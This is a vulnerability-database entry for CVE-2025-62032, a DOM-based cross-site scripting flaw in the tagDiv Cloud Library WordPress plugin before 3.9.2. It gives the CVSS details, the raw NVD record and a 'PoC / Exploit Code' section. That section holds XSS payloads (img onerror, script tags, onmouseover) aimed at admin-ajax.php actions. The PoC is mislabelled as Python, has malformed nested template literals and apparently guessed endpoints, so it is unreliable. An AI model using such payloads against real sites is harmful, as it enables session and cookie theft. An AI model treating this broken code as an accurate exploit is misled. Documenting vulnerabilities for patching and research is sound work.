Security Vulnerability Report
中文
CVE-2025-62032 CVSS 6.5 MEDIUM

CVE-2025-62032

Published: 2025-11-06 16:16:09
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in tagDiv tagDiv Cloud Library td-cloud-library allows DOM-Based XSS.This issue affects tagDiv Cloud Library: from n/a through < 3.9.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

tagDiv Cloud Library < 3.9.2
tagDiv Cloud Library: from n/a through < 3.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-62032 PoC - DOM-Based XSS in tagDiv Cloud Library // Target: tagDiv Cloud Library < 3.9.2 // Method 1: URL-based PoC const pocUrl = `${window.location.origin}/wp-admin/admin-ajax.php?action=td_ajax_search&td_term=`<img src=x onerror=alert(document.cookie)>`}`; // Method 2: DOM manipulation PoC const maliciousInput = '<script>alert("XSS")</script>'; const pocCode = ` // Simulate the vulnerable code pattern document.querySelector('.td-cloud-search-results').innerHTML = maliciousInput; // Attack vector via search functionality fetch('/wp-admin/admin-ajax.php', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'action=td_ajax_search&td_term=<img src=x onerror=alert(document.cookie)>' }) .then(response => response.text()) .then(data => { // Vulnerable code directly inserts unsanitized data document.getElementById('td-ajax-search').innerHTML = data; }); `; // Method 3: Exploitation via Cloud Library template loading const templateExploit = ` // Target: td-cloud-library template rendering const exploitPayload = '<div onmouseover="alert(document.domain)">malicious</div>'; // Trigger via AJAX endpoint const xhr = new XMLHttpRequest(); xhr.open('GET', '/wp-admin/admin-ajax.php?action=td_cloud_get_template&template_id=' + encodeURIComponent(exploitPayload), true); xhr.send(); `; console.log('CVE-2025-62032 PoC generated'); console.log('Vulnerable endpoint: tagDiv Cloud Library AJAX handlers'); console.log('Attack vector: Unsanitized user input in DOM manipulation');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62032", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:09.303", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in tagDiv tagDiv Cloud Library td-cloud-library allows DOM-Based XSS.This issue affects tagDiv Cloud Library: from n/a through < 3.9.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/td-cloud-library/vulnerability/wordpress-tagdiv-cloud-library-plugin-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}